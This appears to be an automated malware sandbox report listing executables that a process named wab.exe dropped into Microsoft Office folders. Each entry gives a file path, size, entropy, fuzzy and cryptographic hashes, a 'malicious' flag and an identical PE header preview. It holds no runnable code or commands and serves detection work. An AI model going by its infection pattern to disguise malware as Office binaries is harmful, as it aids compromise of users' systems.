                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):97920
                                                                              Entropy (8bit):5.808712601175728
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3Vo3zKAtCz72I/Q/RPTO5piDDFwzS:/rkguFvgy5piDD6zS
                                                                              MD5:2196FCEBBDCC593CF5A85F3207970CA4
                                                                              SHA1:9C6B9085378B56500161BDA6339E791A7829F56F
                                                                              SHA-256:B40B4E0A728C5BE2D266FD6BE1E719E65C5DC10D46F15B2DEB346D3ED1B2421D
                                                                              SHA-512:56D7A1B02F56F3BEE9E0038857EF025B0896004A3A077089EE15DC21E3D80C2DD27D46AE11BB7BA877B540C8408EAFEFE57D9B4BE7B05164F33ECA61ACD2F650
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1994448
                                                                              Entropy (8bit):6.525646487599016
                                                                              Encrypted:false
                                                                              SSDEEP:49152:Jl8U9+tiqfG7C+5I6ZOX0Bh4MdDHc/EBRXXZUABfmcQ:Jl8+++7hOXODHc/EdQ
                                                                              MD5:410F8406572FEEF24894B4A4E98FFA77
                                                                              SHA1:A84E51801825B47741FF4ADBA49FBADFC0A44E4B
                                                                              SHA-256:21C6F535FC1ECE2A2CF21F0C54BA190A6A065E4F241AA1DB2068E42AD424FBCA
                                                                              SHA-512:C6543AC541D669DD8B6286DACAD02F25854276EE41DA02F00471CDF6ACCB87CAD04CF517D2712A1E5F88E1BCCE29DCB21183D6C047E94CACB9C2ABAD27D8C22A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):275872
                                                                              Entropy (8bit):3.942096448686192
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3Vo06gJJRaCAd1uhNRu7z3zHt4s+zbCtbCc0xXNmi9RHYOqEWpVOYlOj:/rkn6gxe7z3OzY+9jTYbE+la
                                                                              MD5:61B5DB2F53781D6F8236546BA08301C2
                                                                              SHA1:D9702B47E98A10449322EFD5153CD297FF913D5F
                                                                              SHA-256:F9732C0E5E5B0DCCE692BD04AFAC17DCB68C9521109D49635D309144077D8323
                                                                              SHA-512:F2D93CFFA723E19BEFB62B2663DCB4C5DD363F5E3EBC38BC43B853ACEF00C210AA417E753B5A18F7B353CF0EB4123764A99BFC06E416344D7589A52CB3277D40
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):751520
                                                                              Entropy (8bit):6.454372812643737
                                                                              Encrypted:false
                                                                              SSDEEP:12288:1ccV8BFJ0kz4uP9V6wY2M48aVNfffNfYRweSat8UVNfffNfRtAUUn4lDW7f5sBzl:1OFJbl/6r2M48aVNfffNfWVNfffNfDw+
                                                                              MD5:0F5EA69F9B731ED7976FE7A5BE3112C9
                                                                              SHA1:F215DEEA7A962AD53918B357D3446C87F20B35DE
                                                                              SHA-256:FD7C87041D679B9DD33771C07F05E926623285DFBCD03E4C2285872796213643
                                                                              SHA-512:298081DEAF16A6647C0345931B9E265C0FF62045EDF455F1A05D5A0DF1F926152E4945D707EFD09D0020FE42C798AAD8CEBCD3485DB3EC69201E95BF1357D22A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):182712
                                                                              Entropy (8bit):5.991097370883514
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkDDbGpEPwVH+lMCNy0GEVVS1ikLrDdevXqHai8MBEL4:AXSSwVgvfkhvzHcWEM
                                                                              MD5:2ECB09CF5AC73C6FA0F79F569C5F5E33
                                                                              SHA1:021A327B831B7274F99D0CC901D53F60C2FD6DEB
                                                                              SHA-256:67D9B8EE314FFDDCDB506B2406A0DE54FC016CF45BB290F905B0C21E0D1B97F0
                                                                              SHA-512:C3A3EAEB57F06E8316B0F2A3AE9F53F26A226F1472403A482BF64D25922D53D4AE5407BC0BC3099CFF6016D9CA6023508653D68C0BF67F25627E9492C49F1338
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):5174360
                                                                              Entropy (8bit):7.254989378596742
                                                                              Encrypted:false
                                                                              SSDEEP:49152:Z/xFnOvtaWIDn0apLKkLJU9nU2foKhA4vSWidGHp+NDGQUzbpDOfjxAkrQKl+RPp:LtLK3BDhtvS0Hpe4zbpaAKQkroGIz
                                                                              MD5:9C81D83BB362C1DE8724A9D0F2FDE901
                                                                              SHA1:804F2A1A3452F0EE2A2927D2817FDED08537AF86
                                                                              SHA-256:B620BDB560C23896656F932757F75224BAA4F021EF5273E0E50C2D0589CA0DEE
                                                                              SHA-512:2BCB260191D9B41C17C2967369F9376032084A2C849DF07C1CB36B0C7BDCDF33CBBF3DF5DC4F1E562608C9B1B33183DCD5E8E7C06907B6DFA8F971D6E600D1C6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):139712
                                                                              Entropy (8bit):6.126888776763665
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkyU5adWAKmzUccnzkVBgEuKjj0WWtPPoI:o+EjzCg+j6P3
                                                                              MD5:01C07B3F77E45B90A01EF08F9085EDAC
                                                                              SHA1:88E01F7DB25790C04120D1F0B07CE7FEDE5CC00D
                                                                              SHA-256:1BB7ABD1F7910288188F0E5BF4F47548F5D1DDB8D71DC3A7425BF85E4FE5D1C8
                                                                              SHA-512:95213B6441F935826322EB8B3B1C77C9E853362FB391014EC440311DC06893D023BC88A57A4FFB7F5C111278C450D1D1B06FCC694FBBF199D4538EC37BB02240
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):380368
                                                                              Entropy (8bit):6.555084907734949
                                                                              Encrypted:false
                                                                              SSDEEP:6144:2zgSb/029S2P/7nzGxFrRN0r0ivCZci1FXiO8DaS4wwE0CBlFJmcx:Nw/2q/roN7ivCZci1FC74wdBlFYU
                                                                              MD5:AA927AD1ECD836AC249D42BF94DE3A65
                                                                              SHA1:51FF7EE07974A0BDD31A14E15C652832026C9700
                                                                              SHA-256:7F7D93ECFB08D1D594AA97FF649C18078A78239E8716F7D4AA369DC5733EAA9F
                                                                              SHA-512:A942E512BEC89434D862BF09E39C157F6FE1243B31C0719EE5257285ADE088F532F3DAD6AADDC2D9DB29C0D1B26E39DF8B79C825D8721C522E9BD286809AA161
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1269696
                                                                              Entropy (8bit):3.675615217628684
                                                                              Encrypted:false
                                                                              SSDEEP:6144:Yvk8/0NhFYAddenZhUhTNnLUrh+9nTGLljX4wuSzVF:k4wXF
                                                                              MD5:B02491C0452A296007FEFEC01AABABFB
                                                                              SHA1:8E83A59312B8FE84FCAFF98D0A4180A4653BA36D
                                                                              SHA-256:2458D82B300F063EBDFB5495840EEFBDF86B6A331AE80C4B93C0D007435F372B
                                                                              SHA-512:E1D9154181404195A0FB1BFF2680F3B534EA248C393623D9E60FC0E5CF7CFDE3C11CEFD7D4F562C176E08856656612E68EA130FE1EBF6F3D66BCF130DD3EC9D2
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):266648
                                                                              Entropy (8bit):3.885766319937084
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VodRaCAd1uhNRuiazvhzpwtWhz7I3EWwwrwYx6RPWdn6ysl4DU1:/rkcezzvhF1h3wEWwwbx6ksl4D
                                                                              MD5:8B9DFC043238EDCB783ECD8C41A25945
                                                                              SHA1:FE7717581B04B161C6B461B00A614124B6CDA020
                                                                              SHA-256:09188D2E565E81399A01D92C291905CF50D750534526C03FC2B431EBA7893127
                                                                              SHA-512:9A17436D210A2B7C124CF89FDF947595D31B381679AFA394CE4CB91FCF867FD630DCDD5A13ECA03CAE77DB09761E86D9F83FC41A4E83D48C1BB1C173F605A75C
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):715760
                                                                              Entropy (8bit):6.454139818255074
                                                                              Encrypted:false
                                                                              SSDEEP:12288:a4tuuLntIMDXw5vde5EFf1Pmbd3lSz3dfp1Swf5M0blmFKuJOJZM30j3:dtFDKMg4iX3djfy0blmFlme303
                                                                              MD5:23804F478E35BBD0AD391BFA092BDFFF
                                                                              SHA1:93151FCABF6BB06771C9FD34A51D28F8300AAB3B
                                                                              SHA-256:62FC292394A77E876CC3F11A17E5A21D1CF799F16D79055FE8F64E8CC240EB97
                                                                              SHA-512:F674FA98BF32A0A174942E55751CF37BB394B2109A878755144A5924110DCF1C4008DE2EFA1A7690D6058ED19B3EC1235BC134BF722771CC866173EA4D89280D
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):619944
                                                                              Entropy (8bit):6.5605409599727995
                                                                              Encrypted:false
                                                                              SSDEEP:12288:nM/Of/Bboj+clWnIKgrP6TFPLNWuX4Pemn3oi8ky9Q8WSe/aSqizuO1qukdQAPnQ:M8JgryFPLNWuX40RulAPn1OcnGVNfffl
                                                                              MD5:0B36F896C07E98A40764FE8764947E5A
                                                                              SHA1:215A5AFC0DE422777682183200EBD4EFF5367268
                                                                              SHA-256:31B10F09605AF8492130A972EF3801D14E70FF683142EA2934323F3FA9353DF8
                                                                              SHA-512:2D613456F0C75693A67DAE00656E6C936AB83B577F7C6DB89F3EDC3A57145667AEFFF6A407146A83309C12B49AA0690ABE85A3C4D7E7C673260121ED85189E99
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):150416
                                                                              Entropy (8bit):6.119086865011351
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkQQPtLW7twRxI5mc5TNN3AsdVgNwihwT3RqEM6ZOfHXb42:ZQMzhdV0nh4Hof7
                                                                              MD5:0A9BABF248FD0BFACE70269A780E12B3
                                                                              SHA1:7300CD652E38734C26E4E1BCC6B2CCB06C69D335
                                                                              SHA-256:D17798E73699309E0889A1C09746EE5F7C4AE74F88BAF39434DAB06025B72535
                                                                              SHA-512:E3281E6CA9ADDE9542F6E80363D28FA870E16757625A7EB74837AEA773F178EAB17B7DA51DC4780747BCC04F9FC3C98BC379F7AF09C1F54642FA8C15ED414D7E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):264576
                                                                              Entropy (8bit):6.453478056220304
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkMPuf72UasmkUTFxn40Zo2KoKik9CxIUUksZcRySTn2TGz+WXwMQuDyaqfqORM:l872jsLuLnPo2TTHswP2TGz3FUCHySYI
                                                                              MD5:FC28EB6FD5C6251911227A55E5F54776
                                                                              SHA1:9A3066DE720838BCDE5A0CD3295103DBAE51E980
                                                                              SHA-256:5439B9E784639C61CB1089FED2ED359A9CB9BE303CFB5C976E75D60AB929636B
                                                                              SHA-512:3DB3DD90B31A176CCF33E7FCCD484A54785E8E33100B88D150BAFA16DB44075A038AA3BCBCF3947799E2C77E69675ED4E90F5E66B1B3A455E1E8A0F30A505EBF
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):108448
                                                                              Entropy (8bit):5.433980224483478
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3Vo9weqz1lezmtJwzojsKyyJFGgHZ//rHzb:/rk2qzXe0wSyyJFD//Hb
                                                                              MD5:96BEF7D0D48512DC35CDD2D4B1FD6EAD
                                                                              SHA1:0EEE984FAC4294D58E25C692C087DFE601D67D01
                                                                              SHA-256:00F9AECF764C5846BD073E8C08BB1CB82388123CCE4B05BC518C3914C941E38E
                                                                              SHA-512:8B3D4D36DC5D77926EB0EB0A1F98C9D40A97457D9F586E6A722093D0F43321FB4709EB799DE85827C705EDA783C5BA847648D9EBF34B014FD932B21D2D57B9EA
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):662600
                                                                              Entropy (8bit):5.905694343231267
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Dpo/FEVciSJJtH4PoR6moWEBfQLxZPhEx7xgtV2hv4tkYUK2tlIqR7lmNK/IKrtK:SFEWi4JtH4PoRfoFIxZPk0NKbB0R
                                                                              MD5:67BF76A8779842B6187E7EF286154124
                                                                              SHA1:2ED18F92D51D677FDC3695406CDA01F5C188E3A0
                                                                              SHA-256:3E4B1C352CE41EA00B9A1BFCFEB4693AEE09E27F5B7F2A46CF3CD00A35FA8FBA
                                                                              SHA-512:A622980F704777BF7115BF9A06AFB89BE0771BC835B11E944A8C592CB3FA05071386ED94547D6159AC03F6F3719AF4726363AC4FC1F0EB10370CB3A4F1A5EF8F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):260560
                                                                              Entropy (8bit):5.172772453978791
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkp4ZAh7ULoQdHBjw8Q2pFj4+W1ISYpksZmRohnonRBfTjzJEthEWV:cPfQdhMuj4VM8imPjGthEWV
                                                                              MD5:9A855D46CF345F40A323616382F3455B
                                                                              SHA1:69629A04683AC5A7163F8BBBF1BB2CB823B17D6B
                                                                              SHA-256:569B5CC8EF232D6674DBEC8D78F81E70023D6EEABBE974DFC68FF4DB763FEAF5
                                                                              SHA-512:DB43F60397080E72BCC5A9B8F24E0833EDADE5C85880F357AE50F0604D2DB2235F1D93F089AA57826DE1E82A8719DFF8CA0F502E7AA0AE37E1DB7229DF139751
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4316200
                                                                              Entropy (8bit):3.8981940471710472
                                                                              Encrypted:false
                                                                              SSDEEP:98304:pYN3nsBQ5ghvEyqf/whWovz9hRJ5RbisrbdsPO9jXsw:eN3nsBcghvEyqf/whxz9hRJ5Rbisrbdr
                                                                              MD5:002CF143B2DB2AD8C0242ADA462F145E
                                                                              SHA1:77DE72A11B14F402C4D501C69BC3FD8B51B4642D
                                                                              SHA-256:75A84EE4590896B68F4D17E5247BA9C76E2809CEB341EEB201493D617D5C7601
                                                                              SHA-512:5BBA377866F2D2AFAC1DFA2201A26A1A1B6491982F0389DCBD5815E6FD9AF7D7110AEC8608926D307437F48501D0E3E4BF89DDA7FEB98214D79B1BFE7510B6BD
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):124056
                                                                              Entropy (8bit):5.162520482821961
                                                                              Encrypted:false
                                                                              SSDEEP:768:sEl9bbSVh7VWYOzL49oWFGJ+fkSk7Rczjn9znrRtPn9zNU4sm2QBcPOvI:sEl9bbS3VoZwu7mzj9zNtP9zNps8Q
                                                                              MD5:3FE3567269EE2A38998100DD56D0C35A
                                                                              SHA1:273677012FE63C88B051D56028DD6915167FBCE5
                                                                              SHA-256:DDB5B86E768F863A56B8B4B717CFBF59A187EF8B1AFA841F7B72237C79A32DB8
                                                                              SHA-512:00A60C9395844CC8DE48DA167E00369E7AAEC59A06F31869CB19DCF86C0BEF5A18EA0C141F408DEEF7DE0A935EB0CDAD27790377258717A1DF592E677B79E0FE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):358336
                                                                              Entropy (8bit):4.285457679979659
                                                                              Encrypted:false
                                                                              SSDEEP:6144:/yUkKOEEIK128d2VKjw0EYsfZJnPmTuJjac2a51lHpLszc/kzY56Y:/x/B/kib
                                                                              MD5:1A65939043DF2CEAD4643A92E4976D91
                                                                              SHA1:B04C8E1BAB15CE5F05071904D4DFD5DA7188EF72
                                                                              SHA-256:A813B53FB7C77DBE4E67D76A488C2B53A298824A6A1BB010FF55FDECFF7A7082
                                                                              SHA-512:BE08E9D6315BDAC96667D3FD36B785EC35F35BD25C7EB6A9421DE403430552F1695707B083C3CA99E30D4FDA33A0A71E10DEA89E65BBFB91FAD35D237B5D45C3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

